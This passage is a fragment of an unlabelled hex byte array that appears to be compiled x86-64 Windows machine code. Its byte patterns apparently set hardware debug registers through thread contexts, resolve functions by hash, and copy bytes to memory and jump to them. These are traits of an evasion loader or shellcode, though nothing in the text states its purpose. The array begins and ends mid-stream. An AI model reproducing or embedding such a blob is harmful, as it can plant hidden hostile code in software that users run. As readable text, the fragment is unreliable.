89,0x45,0x10,0x48,0x8B,0x45,0x10,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x83,0x7D,0x18,0x03,0x74,0x4A,0x83,0x7D,0x18,0x03,0x7F,0x51,0x83,0x7D,0x18,0x02,0x74,0x30,0x83,0x7D,0x18,0x02,0x7F,0x45,0x83,0x7D,0x18,0x00,0x74,0x08,0x83,0x7D,0x18,0x01,0x74,0x10,0xEB,0x37,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x48,0x00,0x00,0x00,0x00,0xEB,0x29,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x50,0x00,0x00,0x00,0x00,0xEB,0x1B,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x58,0x00,0x00,0x00,0x00,0xEB,0x0D,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x60,0x00,0x00,0x00,0x00,0x90,0x8B,0x45,0x18,0x8D,0x14,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x70,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0B,0xFF,0xFF,0xFF,0x48,0x8B,0x55,0x10,0x48,0x89,0x42,0x70,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x68,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x40,0x44,0x00,0x00,0x00,0x00,0x90,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x83,0x7D,0x20,0x03,0x74,0x4A,0x83,0x7D,0x20,0x03,0x7F,0x51,0x83,0x7D,0x20,0x02,0x74,0x30,0x83,0x7D,0x20,0x02,0x7F,0x45,0x83,0x7D,0x20,0x00,0x74,0x08,0x83,0x7D,0x20,0x01,0x74,0x10,0xEB,0x37,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x48,0xEB,0x29,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x50,0xEB,0x1B,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x58,0xEB,0x0D,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x60,0x90,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x70,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x10,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x53,0xFE,0xFF,0xFF,0x48,0x8B,0x55,0x10,0x48,0x89,0x42,0x70,0x8B,0x45,0x20,0x8D,0x14,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x70,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x29,0xFE,0xFF,0xFF,0x48,0x8B,0x55,0x10,0x48,0x89,0x42,0x70,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x68,0x00,0x00,0x00,0x00,0x90,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x48,0x8B,0x01,0x8B,0x00,0x3D,0x04,0x00,0x00,0x80,0x75,0x5A,0x48,0x89,0xC8,0x48,0x8B,0x48,0x08,0x48,0x8B,0x41,0x78,0x4C,0x8B,0x99,0x98,0x00,0x00,0x00,0x49,0xB9,0xBE,0xBA,0xFE,0xCA,0xEF,0xBE,0xAD,0xDE,0x49,0x83,0xC3,0x08,0x4D,0x39,0x0B,0x75,0xF7,0x4D,0x8B,0x5B,0x08,0x49,0x8B,0x0B,0x49,0x8B,0x53,0x08,0x4D,0x8B,0x4B,0x10,0x49,0x8B,0x5B,0x18,0x49,0x8B,0x6B,0x20,0x49,0x8B,0x63,0x28,0x4D,0x8B,0x43,0x30,0x4D,0x31,0xDB,0x46,0x8A,0x14,0x1A,0x47,0x88,0x14,0x19,0x49,0xFF,0xC3,0x49,0x39,0xCB,0x75,0xF0,0x41,0xFF,0xE0,0xB8,0xFF,0xFF,0xFF,0xFF,0xC3,0x90,0x0F,0x0B,0x55,0x57,0x48,0x81,0xEC,0x18,0x05,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xB0,0x04,0x00,0x00,0x48,0x89,0x95,0xB8,0x04,0x00,0x00,0xC7,0x85,0x8C,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x88,0x04,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x85,0x80,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x9A,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x45,0xA0,0x41,0xB8,0xD0,0x04,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3E,0xBA,0x00,0x00,0xC7,0x45,0xD0,0x1F,0x00,0x10,0x00,0x48,0xC7,0x85,0x78,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x28,0xDB,0x00,0x00,0x48,0x89,0xC1,0xE8,0x85,0x33,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1D,0xB1,0x9D,0xA7,0x48,0x89,0xC1,0xE8,0x93,0x31,0x00,0x00,0x48,0x89,0x85,0x78,0x04,0x00,0x00,0x48,0x83,0xBD,0x78,0x04,0x00,0x00,0x00,0x0F,0x84,0xA0,0x00,0x00,0x00,0x48,0x8B,0x85,0x78,0x04,0x00,0x00,0x48,0x8D,0x15,0xCC,0xFE,0xFF,0xFF,0xB9,0x01,0x00,0x00,0x00,0xFF,0xD0,0x48,0x89,0x85,0x80,0x04,0x00,0x00,0x48,0x83,0xBD,0x80,0x04,0x00,0x00,0x00,0x74,0x7D,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0xD2,0x7E,0x00,0x00,0x89,0x85,0x88,0x04,0x00,0x00,0x83,0xBD,0x88,0x04,0x00,0x00,0x00,0x78,0x5E,0x48,0x8B,0x95,0xB0,0x04,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA2,0xFD,0xFF,0xFF,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0xF1,0x7E,0x00,0x00,0x89,0x85,0x88,0x04,0x00,0x00,0x83,0xBD,0x88,0x04,0x00,0x00,0x00,0x78,0x26,0x48,0x8B,0x85,0xB8,0x04,0x00,0x00,0x48,0x8B,0x95,0x80,0x04,0x00,0x00,0x48,0x89,0x10,0xC7,0x85,0x8C,0x04,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x85,0x8C,0x04,0x00,0x00,0x48,0x81,0xC4,0x18,0x05,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x08,0x05,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xA0,0x04,0x00,0x00,0xC7,0x85,0x7C,0x04,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x9A,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x45,0xA0,0x41,0xB8,0xD0,0x04,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE9,0xB8,0x00,0x00,0xC7,0x45,0xD0,0x1F,0x00,0x10,0x00,0xC7,0x85,0x78,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x70,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xC9,0xD9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x26,0x32,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xA3,0x0E,0x38,0x24,0x48,0x89,0xC1,0xE8,0x34,0x30,0x00,0x00,0x48,0x89,0x85,0x70,0x04,0x00,0x00,0x48,0x83,0xBD,0x70,0x04,0x00,0x00,0x00,0x74,0x77,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0x9D,0x7D,0x00,0x00,0x89,0x85,0x7C,0x04,0x00,0x00,0x83,0xBD,0x7C,0x04,0x00,0x00,0x00,0x78,0x58,0x48,0x8D,0x45,0xA0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC1,0xFB,0xFF,0xFF,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0xC4,0x7D,0x00,0x00,0x89,0x85,0x7C,0x04,0x00,0x00,0x83,0xBD,0x7C,0x04,0x00,0x00,0x00,0x78,0x28,0x48,0x8B,0x85,0xA0,0x04,0x00,0x00,0x48,0x8B,0x95,0x70,0x04,0x00,0x00,0x48,0x89,0xC1,0xFF,0xD2,0x89,0x85,0x78,0x04,0x00,0x00,0x83,0xBD,0x78,0x04,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x90,0x48,0x81,0xC4,0x08,0x05,0x00,0x00,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0x83,0x7D,0x10,0x00,0x74,0x15,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x43,0x7B,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x09,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0x0F,0x11,0x45,0xC0,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0xE6,0x00,0x00,0x00,0x48,0x8D,0x05,0x81,0xD8,0x00,0x00,0x48,0x89,0x45,0xE8,0x66,0xC7,0x45,0xE0,0xA0,0x00,0x66,0xC7,0x45,0xE2,0xA2,0x00,0xC7,0x45,0xA0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x45,0xB0,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xA0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x01,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x3F,0x00,0x0F,0x00,0x48,0x89,0xC1,0xE8,0x8A,0x77,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x63,0x48,0x8D,0x05,0x9D,0xD8,0x00,0x00,0x48,0x89,0x45,0xD8,0x66,0xC7,0x45,0xD0,0x10,0x00,0x66,0xC7,0x45,0xD2,0x12,0x00,0xC7,0x45,0x9C,0x02,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x00,0x48,0x8D,0x55,0xD0,0xC7,0x44,0x24,0x28,0x04,0x00,0x00,0x00,0x48,0x8D,0x4D,0x9C,0x48,0x89,0x4C,0x24,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8D,0x77,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x0F,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xB0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x02,0xD8,0x00,0x00,0x48,0x89,0x45,0xB8,0x66,0xC7,0x45,0xB0,0x46,0x00,0x66,0xC7,0x45,0xB2,0x48,0x00,0x48,0x8D,0x45,0xB0,0x48,0x89,0x45,0xD0,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x01,0x00,0x10,0x00,0x48,0x89,0xC1,0xE8,0xD5,0x77,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x29,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD1,0x70,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x2F,0x6C,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x6E,0xD7,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAB,0x2E,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xFE,0xF2,0xC3,0x6C,0x48,0x89,0xC1,0xE8,0xB9,0x2C,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x56,0x48,0xB8,0x75,0x08,0xBC,0xA3,0x3A,0x0B,0x94,0x41,0x48,0x89,0x45,0xE0,0x48,0x8D,0x45,0xE0,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8B,0x76,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x89,0xA6,0x00,0x00,0x00,0xE9,0xAE,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xE6,0xD6,0x00,0x00,0x48,0x89,0xC1,0xE8,0x23,0x2E,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x99,0xF8,0x0F,0x98,0x48,0x89,0xC1,0xE8,0x31,0x2C,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x74,0x78,0xC7,0x45,0xD0,0xD8,0xEA,0x6E,0xE4,0x66,0xC7,0x45,0xD4,0x54,0x0C,0x66,0xC7,0x45,0xD6,0x89,0x44,0x48,0xB8,0x98,0x98,0x8F,0xA7,0x9D,0x05,0x9E,0x0E,0x48,0x89,0x45,0xD8,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xC0,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x50,0xB4,0x00,0x00,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xD0,0x4C,0x8B,0x55,0xE8,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x55,0x48,0x81,0xEC,0x20,0x01,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xB0,0x00,0x00,0x00,0x48,0x89,0x95,0xB8,0x00,0x00,0x00,0xC7,0x85,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x98,0x00,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x85,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x78,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x40,0x0F,0x11,0x45,0x50,0x0F,0x11,0x45,0x60,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xF0,0x0F,0x11,0x45,0x00,0x0F,0x11,0x45,0x10,0x0F,0x11,0x45,0x20,0x66,0x0F,0xD6,0x45,0x30,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xE8,0x15,0xFE,0xFF,0xFF,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x0F,0x88,0xA5,0x01,0x00,0x00,0xE8,0x0E,0xFD,0xFF,0xFF,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x0F,0x88,0x90,0x01,0x00,0x00,0x48,0x8D,0x05,0x9B,0xD5,0x00,0x00,0x48,0x89,0x85,0x88,0x00,0x00,0x00,0x66,0xC7,0x85,0x80,0x00,0x00,0x00,0x42,0x00,0x66,0xC7,0x85,0x82,0x00,0x00,0x00,0x44,0x00,0xC7,0x45,0x40,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0x48,0x00,0x00,0x00,0x00,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x68,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x41,0xB8,0x48,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFD,0xB2,0x00,0x00,0x48,0xC7,0x45,0x00,0x78,0x05,0x00,0x00,0x4C,0x8D,0x45,0xF0,0x48,0x8D,0x4D,0x40,0x48,0x8D,0x95,0x80,0x00,0x00,0x00,0x48,0x8D,0x45,0x78,0x48,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x02,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF6,0x74,0x00,0x00,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x0F,0x88,0xB4,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x78,0x05,0x00,0x00,0x48,0x8B,0x45,0x78,0x48,0x8B,0x8D,0xB0,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xE8,0x48,0x89,0x54,0x24,0x28,0x48,0x8B,0x95,0xB8,0x00,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0xBA,0x00,0x00,0x02,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x74,0x00,0x00,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x78,0x58,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x78,0x52,0x81,0xBD,0x98,0x00,0x00,0x00,0x02,0x01,0x00,0x00,0x74,0x46,0x48,0x8B,0x85,0xB8,0x00,0x00,0x00,0x8B,0x40,0x2C,0x85,0xC0,0x79,0x20,0x48,0x8D,0x05,0x82,0xD4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8A,0x08,0x00,0x00,0x48,0x8D,0x05,0x9B,0xD4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7B,0x08,0x00,0x00,0xEB,0x19,0xC7,0x85,0x9C,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0x78,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0x78,0x48,0x89,0xC1,0xE8,0x61,0x68,0x00,0x00,0x8B,0x85,0x9C,0x00,0x00,0x00,0x48,0x81,0xC4,0x20,0x01,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x04,0x00,0x00,0x89,0xC1,0xE8,0xCD,0x39,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x25,0x8B,0x45,0x10,0x89,0xC2,0x48,0x8D,0x05,0xF3,0xD3,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCB,0x07,0x00,0x00,0x48,0x8D,0x05,0xDC,0xD3,0x00,0x00,0x48,0x89,0xC1,0xE8,0xBC,0x07,0x00,0x00,0xEB,0x5F,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x4D,0xE8,0x48,0x89,0x4C,0x24,0x28,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0x75,0x77,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x25,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x61,0x22,0x00,0x00,0x48,0x8B,0x55,0x18,0x89,0x02,0x48,0x8B,0x45,0x18,0x8B,0x00,0x85,0xC0,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x5E,0x67,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x49,0x67,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xF8,0x0C,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x89,0x8D,0x90,0x0C,0x00,0x00,0x48,0x89,0x95,0x98,0x0C,0x00,0x00,0xC7,0x85,0x6C,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x5C,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x58,0x0C,0x00,0x00,0x01,0x00,0x00,0xC0,0xC7,0x85,0x4C,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x40,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x50,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x30,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x28,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x20,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x10,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0xE0,0x0B,0x00,0x00,0x0F,0x11,0x85,0xF0,0x0B,0x00,0x00,0x0F,0x11,0x85,0x00,0x0C,0x00,0x00,0x48,0xC7,0x85,0xD0,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xD8,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xC8,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x60,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0x30,0x0B,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x13,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x85,0x20,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x28,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0x50,0x06,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x9A,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0xC7,0x85,0x30,0x0B,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0x8D,0x85,0x30,0x0B,0x00,0x00,0x48,0x89,0x85,0x20,0x0B,0x00,0x00,0x48,0x8D,0x85,0x50,0x06,0x00,0x00,0x48,0x89,0x85,0x28,0x0B,0x00,0x00,0x48,0x8D,0x85,0xC8,0x0B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x77,0xF7,0xFF,0xFF,0x89,0x85,0x5C,0x0C,0x00,0x00,0x83,0xBD,0x5C,0x0C,0x00,0x00,0x00,0x0F,0x84,0x67,0x04,0x00,0x00,0xC7,0x85,0xE0,0x0B,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0xE8,0x0B,0x00,0x00,0x00,0x00,0x00,0